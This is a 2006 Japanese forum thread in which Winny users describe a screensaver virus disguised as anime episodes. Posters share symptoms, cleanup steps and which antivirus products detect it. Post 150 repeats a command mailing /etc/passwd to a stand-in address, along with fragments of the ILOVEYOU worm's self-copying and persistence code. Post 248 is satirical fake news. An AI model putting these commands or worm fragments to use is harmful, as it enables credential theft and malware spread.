06/10/31 00:03:19 a+DcblJ8
>>110
うぐぅウィルスは亜種が多すぎるからなんとも言えない
とりあえずそのC直下フォルダ消せばさほど問題はなし
Downフォルダの動画が画像になったり壊されたりしなかった?
113:sage
06/10/31 00:44:05 8apPxawQ
>>112
Downフォルダの動画がbmp画像に変わっちゃってました・・。
Downフォルダの中に別にフォルダーを作って保管していたファイルは
無事だったんだけど・・・。
とりあえず画像になっちゃったファイルだけ削除したんだけど
やっぱりリカバリーする必要ありますか?
114:sage
06/10/31 00:54:32 8apPxawQ
私のはCの下に「MAKOPI」ってフォルダが出来てて、
中身は(早くおでん買ってきなさいよ!アンタのPCがどうなっても知らないよ)
とかいうアニメ絵の画像と、自分のDownフォルダー内に有ったファイル名がbmp画像になって写ってました・・。
これってただ問題のフォルダーを削除するだけじゃあ解決にならないんでしょうか?
115:sage
06/10/31 00:57:21 8apPxawQ
>114
それって はぅ~ぅ って書いてねえ?
116:ウンコの王様
06/10/31 01:04:37 TgKKnopX
人
(__)
( ・∀・)ひどい自作自演を見た
117:名無しさん
06/10/31 03:11:16 a+DcblJ8
あまりにも酷い自演だがスルーせずに書いてみよう
>>112に書いたとおり亜種がやたら多い
何か毎日毎日増えてる気がする
共通する部分は
・nyのdownフォルダ内の動画が破壊(exeも?)
・C直下にフォルダ作成(名前は亜種によって様々、私はAYUAYUAYUだった)
・フォルダの中身はデスクトップ画像とKanonの画像(亜種によっては+exe?)
種類によっては他のプログラムも破壊する
対処は>>92>>93を参考に
118:名無しさん
06/11/01 03:03:32 QPZuYokk
C:\System Volume Information
↑を開こうとすると拒否されるんですがどうしたらいいですか?
119:名無しさん
06/11/01 03:11:14 SSgR9mY6
>>118
復元ポイントのファイルがある。
復元ポイントを無効か削除してみな
120:名無しさん
06/11/01 21:56:30 vLI7qAYX
ここに書き込みしてる時点でWINNY使用者ってことやん。
犯罪者じゃん。
121:名無しさん
06/11/02 19:07:19 cLqLTrJW
>>120
wwwwwwww
122:名無しさん
06/11/02 21:00:12 0idt/0bf
ウィルス作った奴も犯罪者ってことだなww
123:名無しさん
06/11/02 21:09:51 KesOIC8M
感染者が犯罪者~w
作者は悪くな~いw
124:名無しさん
06/11/03 01:40:56 /og6j8gY
システムの復元をしたからかどうかわからないが
削除したSCRファイルが復活してたよwwww
125:名無しさん
06/11/03 12:17:20 MFUgiXp1
126:名無しさん
06/11/03 13:11:05 3sD1HTKw
釣なのかしらんが、Winnyの使用自体は何の違法性も無い。
127:名無しさん
06/11/03 13:49:31 mzL9Sevo
感染者は著作権侵害をするほどの違法者w
こんな奴らを世の中が助けてど~するww
128:名無しさん
06/11/03 18:20:30 Y5KfLSgY
何度読んでも>>80>>82は、俺のツボを刺激する件
129:名無しさん
06/11/03 19:20:40 Ne10jvrI
>>70
それXPProじゃないと
130:名無しさん
06/11/03 21:56:53 9nXxgRa1
[アニメ] デスノート-DEATH NOTE- 第05話 「駆引」 (D-NTV 704x396 DivX640 120fps).avi .SCR
同じフォルダ内のファイルの拡張子をbmpに変えて、サイズを901KBにして壊す。
program files内のEXEを消す
ノートン反応せず。
131:肉茎平均
06/11/03 21:58:54 UoGUy/Nz
なんでwinny使ってるの?
132:残りもの人生 ◆JnidJSJ.Uw
06/11/03 22:01:46 KyFSDoSu
お金がないからだ
133:肉茎平均
06/11/03 22:03:42 UoGUy/Nz
いや、そういう問題ではなくて洒落は使わないの?
134:名無しさん
06/11/03 22:05:25 9nXxgRa1
洒落は使わない
135:名無しさん
06/11/03 22:07:29 p26VxrmB
漢はnyしか使わないと言う人も多いからね
136:残りもの人生 ◆JnidJSJ.Uw
06/11/03 22:07:39 KyFSDoSu
覚えるのがめんどうだもん
137:肉茎平均
06/11/03 22:08:43 UoGUy/Nz
そうなんだ
138:食用ウミケムシ
06/11/03 22:14:30 50X9Xuab
ふと思ったんだけどさ、ウィニーって言ってしまえば集団万引きだよね。
誰か一人が万引きしたのをさ、みんなでまわしあってんだから。
そういう連中が万引きの文句言っちゃうのは無しだよね。
139:残りもの人生 ◆JnidJSJ.Uw
06/11/03 22:20:24 KyFSDoSu
だからまっとうな人間はウィニーなんてやらんのです
ウィニーやってるヤツはみんなクズですよ
140:食用ウミケムシ
06/11/03 22:22:44 50X9Xuab
じゃあ、クズの連中は万引き容認で有り、あびる優だかって万引きアイドルを擁護したりする連中ってことでOKなんだよね。
するってーと、ネットの中は真っ当な連中ばっかりってことで仮想空間ですよね。
141:食用ウミケムシ
06/11/03 22:25:23 50X9Xuab
なんか日本語おかしいな。素晴らしい仮想空間ですよねって書いたつもりなのに。
142:名無しさん
06/11/04 00:51:31 H+8JL2pM
なんか川澄舞のやつにやられた。
C直下にMAIってフォルダ、これってうぐぅの亜種?
143:名無しさん
06/11/04 14:54:14 3kr9VHnc
>>130
同ファイル&同症状に陥ったよ。
Program files内全滅に限りなく近い。
とほほ。。。
現在OSクリーンインスト中。。。
144:名無しさん
06/11/04 17:06:45 E2XBxg/Z
藻前ら、まだやられてるのかよ。。。
145:名無しさん
06/11/04 17:11:01 E2XBxg/Z
>>128
感染しても早いうちに再起動すれば被害は少なくて済むらしい。
146:名無しさん
06/11/04 19:08:59 qJsoa/vZ
program filesほとんどやられた人は感染したときに
そのまま放置でもしてたの?
それと、Shareの使い方が分からんとか覚えるのがめんどくせーとか
言っている人がマジで言っているのかどうかが気になる。
147:名無しさん
06/11/04 20:41:57 Wqn20JeP
scrやらexeやらを無視&再生前に拡張子識別
これだけやっとけばいいだけの話と違うの?
なんでこんなのに引っかかるの?頭脳がマヌケなの?
148:名無しさん
06/11/04 21:36:43 EqcAgMna
放置してたしマジで言ってる
149:名無しさん
06/11/05 11:30:03 YOsduInI
ノートンも全然反応しなかったし、
スクリーンセイバーが悪さするとは思わずに、どんなスクリーンセイバーなんだ?
と見てみたらカワイイアニメの女の子がうぐぅうとか言ってるだけだったんで、
なんだよこんなスクリーンセイバーしかつくれないのかよ情けないな
とか思ってあきれていたら。。。。
HDDの中身60GBとprogram filesの中身消されました
150:名無しさん
06/11/05 12:20:42 v+Aap0y/
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
151:名無しさん
06/11/08 00:52:48 nBIkjUUV
(アニメ) デスノート-DEATH NOTE- 第06話 「綻び」 (D-CTV 704x396 DivX6.22 120fps LameVBR).avi .scr
俺も上のファイル踏んで引っかかった。
内容は「たいやきまだー?」って書いてあるあゆの画像が出てきて
ProgramFileのexeは全部消された。cの直下にはKAMOMってフォルダが出来てて
-Readme-.jpgとUSBSHOW.bmpって2つのファイルだけがあった。
C:\System Volume Information\_restore\はシステムの復元をしても
なんか開けなかった。
どうせほとんどのexe消されたし丁度いいからクリーンインストールするべきだな。
152:名無しさん
06/11/08 01:07:57 d3bSprHQ
じゃあしろよ、踏んで良かったなら報告するなよww
153:名無しさん
06/11/08 11:45:37 b6VW48qu
>>152
わざわざ報告してくれた人に大して低脳なレス返すなよ。
154:名無しさん
06/11/08 11:50:17 6atkqqYm
>>151
同じくデスノ6話にやられた
ファイル名が少し違ってて、VBRの後ろに(気まぐれ不定期)
開く前のウィルススキャンはスルーだった
開くとルルーシュの画像が出てきて「オタ野郎名前を名乗れ」と言われたw
HDD内の動画や画像は大丈夫のようだけどprogram filesがやられたので
再インストするよ
155:名無しさん
06/11/08 15:40:17 fig3+UuS
おれも、動画ファイルでやられた。拡張子はAVIだと思う。動画のマークになってたし。よく見ないで消してしまったのでscr がついていたかもしれない。ウイルスバスター2005反応無し
2007だと反応するか教えて。.
上の人ように破壊されたのとProgram Filesのなかも破壊された。
対策はMedia Player Classicで見ようとしたら反応しなかった。反応しないのはscrの拡張子だったからかも知れないけど。そのあとメディアプレイヤーでみるとウイルス感染した。
あとは極窓で調べるか。?がでたら消す でも極窓は動画に?出すこと多いのでオススメできない
これ以外の方法をよろしく
156:(>_<)[sage]
06/11/08 15:41:53 FtTF0uqf
ぁぁ
157:名無しさん
06/11/08 15:48:08 nEfoTd95
なにこのスレ?
158:名無しさん
06/11/08 17:49:22 B2Drt8Oq
XPで拡張子表示するのどうやるんだっけ?
159:名無しさん
06/11/08 18:10:51 NOUrxCY6
Cドラ直下のフォルダ消すだけで駆除おk?
160:めありべる ◆6yD.And.LA
06/11/08 18:50:42 BLRrw8VB
ガキはエロ動画見る為にパソコンに強くなっていくからいいよな。
161:名無しさん
06/11/08 18:51:58 ZAyHJUtA
男性はみんなそうだよ
162:めありべる ◆6yD.And.LA
06/11/08 18:53:20 BLRrw8VB
男っていつまでたっても低俗ね。
163:名無しさん
06/11/08 18:54:31 Jh825CQD
>>158
それでいいらしい
元のscrファイルも消去したほうがよい
164:名無しさん
06/11/08 19:48:39 nEfoTd95
ネカマがなに言ってんだ?
165:名無しさん
06/11/08 19:51:28 qOn2u+s5
自分がPCに疎いからって女がみんなPCオンチみたいに言うなよ
他の女性に迷惑だろ
166:名無しさん
06/11/08 19:56:47 GhaKW/ZO
コードギアスの3話で引っかかったが・・・
破壊された所が無い?
山田チェックでは何もレジストリの改ざんは無いと表示される。
他に変更される箇所とかあるのだろうか?
167:名無しさん
06/11/08 20:54:14 k4VPHAqx
>>166
このウィルスは確かレジストリは弄られないんだよね
だからウィルス発動→即PC再起動とかすれば被害殆ど無し
今は亜種だらけだからどうかワカランが・・・
168:名無しさん
06/11/08 21:02:10 d3bSprHQ
>>166すでに情報はどこかに取られてると思うが,...
169:肉茎平均
06/11/08 21:03:46 4WxOyMf4
>>158
マイコンピューター→ツール→フォルダオプション→表示→登録されている拡張子は表示しない のチェックをはずす
170:名無しさん
06/11/08 21:37:07 p47vpyd7
>>167
その通り。大きい被害を受けたやつはアホの極み。
171:名無しさん
06/11/09 12:58:30 nxbEOB3M
>154だけど
山田チェッカーでは異常無しだった
C直下にできていた BRITANIAフォルダ(画像とSS入り)を削除しても
PC立ち上げなおしたら復活していた
同様に削除したscrファイルも復活してた
172:名無しさん
06/11/09 13:06:10 0TugMK6N
>>169
肉っちありがと!
173:名無しさん
06/11/10 04:59:21 Ujs1igd6
なぜ山田チェッカー?
原田ウイルスの亜種に山田チェッカーは意味無いと思うけど・・・
174:名無しさん
06/11/10 09:39:13 vlEENeZ+
コードギアスの六話で引っかかった
バレーの延長で気が動転して慌ててダブルクリック。その時視界は既に種類の覧に「スクリーンセーバー」の文字を捉えていた
175:名無しさん
06/11/10 10:51:36 DNFlVGNb
俺も昨日の夜引っかかっちまった。風呂上りで油断してた。
コードギアスの704x396版なんつうものがあったんで、なんじゃこりゃと
頭数MB落として強制変換してGOMでちょっと見てみようと実行。
_incomleteファイルだったんで、変なファイルだったら
実行されないだろうと思ったのさ。あぁ笑うがいいさ。
DLフォルダ全てbmp化、Program Filesフォルダのいくつかのexeを壊されたところで
やばさに気づき再起動。
cドライブ直下にKAMOMフォルダが作られてた。
とりあえず削除。
これで駆除は終わったのだろうか……
プログラムを実行してしまった直後、
ついひと月前に買ったウィルスバスター2007が一応反応はしたが、
こいつは役に立ったのだろうか……
その後スキャンしたが、ウイルス検知はされず。怖いな。
しかし再インストールは避けたい……
176:名無しさん
06/11/10 11:06:33 uTRos+eY
>>175 704x396は普通だが...?
177:名無しさん
06/11/10 11:11:23 4BbjG01a
コードギアス5話みたらなぜか古畑みたいのが流れたから即消したがあれは関係ないか
178:175
06/11/10 11:38:19 DNFlVGNb
再インストールじゃなくってクリーンインストールは避けたいなぁ。
>>176
ギアスはふつうのHiVisionサイズより縦長。
横704なら縦486になる。
179:名無しさん
06/11/10 11:53:42 bPb9FVAL
>>109の監視ツール入れておけば最後の防衛ラインが作れるのに・・・
システムの復元の中のコピーとC直下のフォルダ消せば
駆除はできたことになるんだろうけど、program filesがやられてるなら
どうなんだろ。消されたプログラムの再インストで直るのかな?
180:名無しさん
06/11/10 11:54:55 bPb9FVAL
>気が動転して慌ててダブルクリック。その時視界は既に種類の覧に「スクリーンセーバー」の文字を捉えていた
ワロタ。ウイルスに引っかかる時なんて大抵そんなもんだよ。
181:肉茎平均
06/11/10 11:56:28 Ij4pYV1I
nypってver.2とか3で使ってたら意味無いの?
182:名無しさん
06/11/10 12:39:50 S77nsgqY
わがんね
183:名無しさん
06/11/10 13:59:14 rrYxk3H8
これさあOutlook Expressとか破壊されるからさ、正直クリーンインストールやってるのと変わらないくらい、復帰させるの大変
それに動画と思ってクリックするからさあ、今までで最悪かな
184:名無しさん
06/11/10 15:51:18 bzD95nLT
作られたフォルダ削除と件のファイル削除して
再起動してもCにフォルダ作成されてなければ駆除できてる?
185:名無しさん
06/11/10 16:40:13 YW+4dCF1
対策をうだうだ書くより右クリックする癖付けろって一言のほうがいいよ
186:名無しさん
06/11/12 09:39:13 sH+Nfzla
ファイル・・・鯛焼きのbmpに書き換わってしまったんだが、ファイルの復元ってできないのかな?
今まで溜めたファイルがゴッソリと鯛焼きになってしまって・・・
187:名無しさん
06/11/12 10:10:56 Hhxb7aU4
復元できるよググレカス
188:名無しさん
06/11/12 11:23:01 jAJpWCo7
俺は出来なかった
189:名無しさん
06/11/12 13:00:19 koa4hVwA
【1】万が一に備えてクリーンインスト&必要アプリインスト済み状態のバックアップCD or DVDを、Ghostやその手のソフトで事前に作っておく。
【2】「フォルダオプション」→「表示」→「□登録されているファイルの拡張子は表示しない」のチェックは外し、すべての拡張子が見えるようにしておく。
【3】Nortonは無反応なのでアテにしない。
【4】無視条件に「.scr」「.exe」を入れておく。
【5】圧縮ファイルを解凍した際もファイル名を確認。
【6】メディアプレーヤーのアイコンであっても、ファイル名を確認。ぱっと見「.avi」になっていても、さらに名前はスペースで続いており、実は.scrや.exeファイル。
【7】それでもひっかかったら、ぼけっとせずに即再起動、Cドライブ直にある見覚えのないフォルダ(大半Uguu…)と、元になったavi(ってか.scr)は消す。
【8】復元ポイントに関しては以下を参照
URLリンク(esupport.trendmicro.co.jp)
【9】被害が大きい場合、小さくても気味悪い場合、【8】が面倒(よくわからん)場合は、【1】を使って復旧またはOSのクリーンインスト。
190:名無しさん
06/11/12 13:04:30 jAJpWCo7
一番の方法は、タイヤキ欲しいって言ってるんだから
鯛焼き買ってくればいいのに....(/・ω・\;)
191:名無しさん
06/11/12 14:01:00 sYUetizC
雪が降ってる・・・
192:名無しさん
06/11/12 14:21:14 vgZirBA0
こなああああゆきいいいいいい
193:名無しさん
06/11/12 14:46:39 +R9vm7pr
エロゲオタキモい氏ね
194:名無しさん
06/11/14 02:06:33 mqSOa4+T
C:\System Volume Information\_restore\ってどこにあるんだ?
オレのPCにはないんだが・・・
195:名無しさん
06/11/14 12:43:29 qKgw2GV+
>>194
URLリンク(www.google.co.jp)
196:名無しさん
06/11/15 00:43:47 vEQp+rEP
くだらない邪魔が入るのは仕方ないとして、悪意のある人間は連日のイジメ報道でもあるように改心しないですから。
この問題をきちんと整理しましょう。
僕はウイルス・プログラムを捕獲し、MOに入れました。かなりダメージを受けて、めちゃムカついています。警察に届けるつもりです。
このプログラムは、VBを作う作者らしい男の名前をとって、「VB谷口悟郎」ウイルスとしても構いませんか?
彼を見つけたら、最寄りの警察に連絡してください。ウイルス・プログラムに本名を入れるとしたら、社会性が乏しいくせに、目立ちたがりの幼稚な犯罪者でしょう。
VB谷口ウイルスに感染すると、Cドライブに、「KAMOM」などの名前のフォルダ、丸はマークのアイコンを付けた「Winny.exe」、「タコウインナ-たべる?」というアニメ画の少女が描かれた「-Readme-.jpg」 、デスクトップのスクリーンショット「USBSHOW.bmp」
もう一つ、「UPLOADMAN21」というフォルダと、「EX-1.bmp」「EX-2.bmp」「EX-3.bmp」という名前のスクリーンショット画像が入っています。
ダウンロードしたファイルをよく気をつけて見ると、スクリーンセーバーになっています。
僕の場合、WINNYを入れてないPCで起動させてしまったので、Cドライブのプログラム・ファイルのフォルダ内を削除されました。
もし、ファイルを削除して、デスクトップのスクリーンショットを取って、アップさせるだけの単純なものだったら、
キモイ中学生でもできてしまいます。
被害は相当程度広範囲に起きることが予想されるため、VBを使っている「谷口悟郎」なるオタクを警察に連絡して、プログラムにどんな機能を持たせたか聞くか、警察に届けて解析してもらう方が早いかな?
以上、他にも何か分かっていることがあったら、よろしくお願いします。
197:名無しさん
06/11/15 01:14:33 vEQp+rEP
すみません。谷口悟郎というのは、アニメの監督なのですか?
子どもじゃないから、アニメは見ないし、ググッって初めて分かりました。
大人だと、まったく分からないからね。
谷口悟郎が作者名ではないことが分かりましたが、犯人は幼稚なオタクだということしか、分からないということになりました。
絵もキモイし、やってることもキモイし、アニメの監督を崇拝している?
理解できない! 警察に届けた方が早いようです。失礼しました。
198:名無しさん
06/11/15 01:29:24 kbtvqrMu
ウイルスに築いて、即タスクマネージャ、起動して、
目ぼしい.exeを全部停止したら復元ファイルまではやられないですんだみたい
199:名無しさん
06/11/15 03:14:28 JYCIjwQ5
うちのはハードディスクまで破壊されました…
復元ポイントも破壊されてバックアップから起動しようとしたらNTSDR to misringとなりリカバリーかけたらハードディスクが壊れている可能性が…ってなりもうダメでした。
200:名無しさん
06/11/15 03:15:37 3n3Q+URc
感染する人がどういうものを落としてるのか気になる
201:名無しさん
06/11/15 05:43:57 pZ/TXoL8
>>196>>197
ID:vEQp+rEPって単なるアホ?
202:名無しさん
06/11/15 07:35:24 FEdNxZvs
このスレは相変わらずほのぼのしてるね
203:名無しさん
06/11/15 07:44:59 EK0Tc49i
このスレは自作自演でお送りしております
204:名無しさん
06/11/15 16:36:06 W+N03FKd
>>197だから犯人は谷口悟郎だってば!!
205:名無しさん
06/11/15 20:43:26 F85lgj+a
>>197がVBを使う作者まで辿り着いたのはスゴイ事だと思う
206:名無しさん
06/11/16 00:36:36 f1cLEEDo
>>197が作者なんだろ?
207:名無しさん
06/11/16 08:05:40 MKG/XLwf
うーん…
ネギま!? 第07話 「見えた方がいいことってある」 (704x396 DivX511 120fps).avi .src
開いたらコイツに感染したっぽい。
トリップ詐欺&avast信じてて油断してた…○| ̄|_
なんかウィンナーがどうたらこうたらの画像が映し出されたから
コレはマズイと思って速攻終了させたんだけど、
program files内のexeファイルが半分くらい消された。
RAID環境のせいか消すの早すぎだろお前…。
とりあえずC直下に出来たフォルダとwinnyフォルダ消しときゃ大丈夫なのかな。
早く消したおかげかスタートアップも何も増えてないみたい。
レジストリ使わないソフトはDドライブにいつもインスコする癖があってホントに良かったと思った。
とりあえず報告までに。
長文スマソ。
208:名無しさん
06/11/16 08:09:56 jxRIaXlF
URLリンク(blog.livedoor.jp)
これで監視しろよな
209:207
06/11/16 08:15:16 MKG/XLwf
あとあと
C:\Documents and Settings\ユーザー名\
内のフォルダのファイル群がbmpに置き換えられてました。
以上。
>>208
thx。最近何事も無かったからついつい油断してた。
この際にセキュリティ強化してみようと思う。
210:名無しさん
06/11/16 18:23:31 A+tleg22
今まで体験したウイルスの中で一番ひどいわこれ
avastに反応しなかった
HDDの200GB近くが消えた
それにしてもジャ○ラックの裏工作員はよくまぁこんなもの考えるねぇ
むかついたから年中nymx起動してファイル垂れ流しちゃおうかねぇ
まだまだこれくらいではP2Pやめないよ
211:名無しさん
06/11/16 19:41:38 GhZJwC5x
こういう単純なウイルスが出るたびに常に新規ユーザーはいるんだなあと思う
212:名無しさん
06/11/16 19:43:05 SmjkhUFH
しょぼいウィルスだな
なんか深い階層まではbmpしてないし
213:名無しさん
06/11/16 20:41:37 uqfkZc8J
拡張子で.scrになってるのにダブルクリックしちゃうアホにいちいち話合わせてられるかボケ
214:名無しさん
06/11/16 21:39:10 OCeU7Bz9
>>213
ジャ○ラックの裏工作員キタコレ
215:名無しさん
06/11/16 23:11:44 OUzBcS9Z
トリップ偽装されてたので警戒心が緩んだ。
216:名無しさん
06/11/16 23:41:28 WkA9fuxt
>>210
俺も断然やる気出てきたぜ
217:名無しさん
06/11/17 00:06:43 nGMvJf1F
>>210自分の個人情報とか??
218:名無しさん
06/11/17 14:24:33 4myrZyq9
このウイルスは個人情報漏れたりすんの?データ消されるだけ?
219:名無しさん
06/11/17 15:52:49 4myrZyq9
C:\System Volume Information\_restore\のは消さなくておk?
220:名無しさん
06/11/17 17:52:44 4myrZyq9
>>93の>OutlookやIE等の.dllを何らかのファイルに置き換えようとしていたのが分かりますた。
これはほんとなの?
221:名無しさん
06/11/17 18:23:51 nGMvJf1F
>>220実行してみればわかるよw
222:名無しさん
06/11/17 18:30:12 4myrZyq9
>>221
もう実行したんだぜw
_restore内のは本体だけ削除すればいいのかな?
223:名無しさん
06/11/17 21:39:14 F+WGrVGz
カスペのオンライン検索でなにかひっかからないのかな?
224:名無しさん
06/11/17 23:13:57 tTa7acmg
ウイルスバスターもまだ検出できないな。
こりゃウイルスバスターは使えないわ。
225:名無しさん
06/11/17 23:24:39 B8B/q3RB
RegseekerのUnknown Hard Errorで逆に撃沈させてやった
些細なウイルスだな
226:名無しさん
06/11/18 00:00:41 AuxcWnYd
なんかこのスレって不思議
明らかにロビーじゃないところの人が集ってると思うのに
どうしてみんないつものように死ねとか言わないのか
227:目黒ゑびす ◆RC04/GZfx2
06/11/18 00:02:18 jKxKGTPJ
馴れ合いじゃないからなじゃないの
228:肉茎平均
06/11/18 00:03:31 JHgwiDPM
拡張子も確認しないで実行するなんて信じられないし
229:ウンコの王様
06/11/18 00:04:54 dMdwihz6
人
(__)
( ・∀・)話がループしてない?
230:名無しさん
06/11/18 00:05:01 AuxcWnYd
馴れ合いと相互扶助の違いがいまいちよく分かんないなあ
231:名無しさん
06/11/18 13:50:43 FeZMrzCU
ブラックラグーン19話でやられた
マイピクチャ、マイドキュメント、マイミュージック、あと貯めてた音楽ファイルが全部たいやきになった\(^o^)/
でも、どうやら2層までしかたいやきになってなかった。3層ぐらいに入れてたファイルは全部無傷でした。
C直下には、AYUFILEってウイルスフォルダが入ってました。
今のところ、他の被害は見受けられません。
でも、なんか怖いからクリーンインストールするつもりです。
232:名無しさん
06/11/18 16:06:19 FeZMrzCU
たいやきになったファイルは元に戻らなさそうだな。。。
復元してもたいやきだったし。。。
233:みのりかわ可奈子
06/11/18 16:44:25 9s7yTbI8
たいやきってなんじゃろ
234:名無しさん
06/11/18 17:08:11 e7rqF5F7
>>233 「kanon 月宮あゆ」で検索してみ
235:名無しさん
06/11/19 11:32:46 hXtRPnE7
これ・・・ファイルの復元方法ってないのかな・・・
236:名無しさん
06/11/19 11:45:47 RPIFYv2C
C直下に作られたデスクトップ画像ってWinny経由で
アップロードされるのかな?
237:名無しさん
06/11/19 14:37:17 2HP0S6XV
ny経由ではなくてftpサイトにアップするらしい。
238:名無しさん
06/11/19 14:38:53 stbfIN3m
デスクトップ画像だけでしょ?
239:名無しさん
06/11/19 14:45:50 cfEJal0p
ファイルって元にもどらないのかな?
240:名無しさん
06/11/19 14:50:24 YHppD7Pq
運が悪くない限り戻せる
241:名無しさん
06/11/19 14:56:22 cfEJal0p
元のファイルってどうやってbmpから戻したらいいの?
242:名無しさん
06/11/19 16:02:01 Z4JvnMZx
拡張子をbmpから書き換えればいい、ただそれだけw
243:名無しさん
06/11/19 16:12:52 cfEJal0p
書き換えたんだけど再生ができないです。ファイルサイズが
へってるんですけど?
244:名無しさん
06/11/19 16:32:14 Z4JvnMZx
じゃあファイルサイズをふやせばいいじゃんww
245:名無しさん
06/11/19 17:53:51 RPIFYv2C
>>243
名前が同じってだけで全く別のファイルで上書きされてるんでしょう。
諦めなさいな。そんなに大事なファイルだったのか?
246:名無しさん
06/11/19 18:07:09 xTeWrURs
諦めたほうが良い。
247:名無しさん
06/11/19 19:11:48 j4AKvdVk
俺は『ネギま!?』の七話でこれにやられたわ。
ウイルスバスター2007が使用不能になっちゃった…。
システム復元で元に戻った、…ぽいけど??
248:名無しさん
06/11/20 04:19:35 EHYERv6v
【社会】総務省、LANケーブルを引き抜くロボットを開発、ウィニー対策で
総務省は30日、平成19年度予算の概算要求をまとめ、その中で、「ウィニー」などファイル交換ソフトによる情報流出被害を
最小限に抑えるためのLANケーブルを抜くロボットを開発する技術予算として16億円を盛り込んだことを明らかにした。
このロボットはファイル交換ソフト起動とともに、オフィス内のLANケーブルを探し、コネクタから引き抜く一連の動作を行うロボットで、
一体100万円程度の価格を目指す。開発予算の多くは、LANのコネクタの爪をつまむアームの開発に費やされる見込み。
ノートパソコン等に普及している無線LANについては、強力な妨害電波によるジャミング等の手段が検討されているが
オフィス内の他の機器への被害も大きいため、ノートパソコンを机から落として壊すなどの手段を採用するものと見られている。
249:名無しさん
06/11/20 04:39:02 ZJ7TZ4Wy
>>247
仲間www
250:名無しさん
06/11/20 12:19:15 EfSBuRaf
オリンシスかコードギアスでやられた
KANONの川澄舞のスクリーンセーバーでたこさんウインナーがどうとか
電話番号みたいなのもあったな
ファイルのサムネがでなくてダブルクリックしてスクリーンセーバーだと気づいたときには時すでに遅し
ただ、ダウンフォルダじゃない別のフォルダで開いたのでそのフォルダ内のファイル全部書き換えられただけで済んだな
すぐにスクリーンセーバー強制終了して削除後再起動してバスター2007で検索かけたが何もみつからず
251:名無しさん
06/11/20 12:31:09 H38VnTB9
バスターは糞。avast!も検出しなかったらしい。(>207-210)
252:名無しさん
06/11/20 15:31:27 EfSBuRaf
CドライブみてたらHIZACってフォルダが作られててデスクトップ画像と
URLリンク(www.sunseagull.com)
が入ってた。
OSをCドライブにいれてなかったから被害が小さかったのだろうか
またCドライブをスキャンしてみる
253:名無しさん
06/11/20 16:55:41 3Yvtltb+
73
254:名無しさん
06/11/20 18:19:23 Fh/JyS9u
763
255:名無しさん
06/11/20 18:34:36 86DkI7k1
AVGだと検出できる。
256:名無しさん
06/11/20 18:55:18 pd9h42MC
うんこ
257:名無しさん
06/11/21 20:25:43 ZJ6ykDIy
a2だと検出できる
258:名無しさん
06/11/21 20:37:04 0huRFs8g
a2ってなに
259:名無しさん
06/11/21 20:39:17 Jb6Vveqa
だれかあの電話番号に電凸した人はいないの?
260:名無しさん
06/11/21 23:37:38 ZJ6ykDIy
>>258
a-squared Free
261:名無しさん
06/11/22 20:45:33 MWfk4rhx
俺が拾ったのはMISAKA-125-0.exeってヤツ
262:名無しさん
06/11/22 20:57:03 XRFsf2gD
今のところ検出できるのは
ノートン、カスペ、AVG、a2
検出できないのは
バスター、マカフィ、avast!、AntiVir
263:名無しさん
06/11/23 02:08:59 bBLd96RH
>>262
バスターやavast!で検出できないのは痛いな
264:名無しさん
06/11/23 02:57:46 GYWlf++L
AVGが反応したやつこれだったのか。
デスノート第7話 曇天
右クリスキャンでたすかった。
265:名無しさん
06/11/23 20:19:50 cR/badXr
このウイルスファイル圧縮すると1MBくらいにしかならないね
266:名無しさん
06/11/24 01:20:07 uNKEtLLa
俺も引っかかったけどディスクトップの画像取られてKANOMI?
見たいなフォルダー作られた以外何も無かったよ
267:名無しさん
06/11/24 09:13:02 NuYsjyNB
>>266
俺も俺も。タコさんウィンナーとうぐぅ両方引っかかったけど(おぃ)
フォルダと画像撮られただけで、programファイルのexeが消されたり、
bmpに変換させられたってことは無かった。
バスターは勿論未反応だったけど、他のオンラインスキャンやっても
特に問題ない様子。
268:肉茎平均
06/11/24 11:46:18 elN+mL7P
遂にダウンロードも違法になりそうですよ
URLリンク(vista.jeez.jp)
269:名無しさん
06/11/24 11:54:42 ylaRmCDb
逆に考えるんだ。法が施行されるまで安全だと考えろ
270:肉茎平均
06/11/24 11:56:23 elN+mL7P
ふむ。
271:名無しさん
06/11/24 11:57:34 kZUs4JEp
アップロードが明確に違法だとされてからも
これだけファイルが出回っている現状を考えれば
ダウンが違法になっても特に何の問題もないでしょ。
272:名無しさん
06/11/24 12:34:55 WenPAV9l
>>267
いいなぁ、俺はProgramFilesもやられたよ。
いつまでも動画が映らないからって3回も起動したからだろうか。
273:名無しさん
06/11/25 12:56:43 mOhAupiS
nyフォルダ内に隠しupフォルダが勝手に作られて、
HDD内のメディアファイルがそこに送られている・・・
upフォルダ内にはmp3やavi,wmvファイルが、アプリケーションとなってそこにある。
パーティションを区切っているが、nyが入っているところは満杯になってしまった。
upフォルダは削除できない(フォルダに送っている途中の扱いで)。
フォルダが作られた日時と誤差2分でwinsocks.dll、explorer.exeが、
ウイルスバスターで隔離されている。
クリーンインストールせずに、このupフォルダに送るコマンドを止めさせる方法は
ないのかな?
274:名無しさん
06/11/25 13:12:36 VGkfKkFW
>>273
Ctrl+Art+Delでタスクマネージャを開き、プロセスタブ内のリストから選らんで終了させる。
275:名無しさん
06/11/25 13:21:04 VGkfKkFW
あと何種類かのセキュリティーソフトメーカーのサイトに行って、
オンラインスキャンをやってみるべし。
それで駆除できたなら、クリーンインストールしなくて済むかも。
駆除後も変な動作が確認できるなら、クリーンインストするしかないね。
276:273
06/11/25 13:35:32 mOhAupiS
>>274-275
レスサンクス!
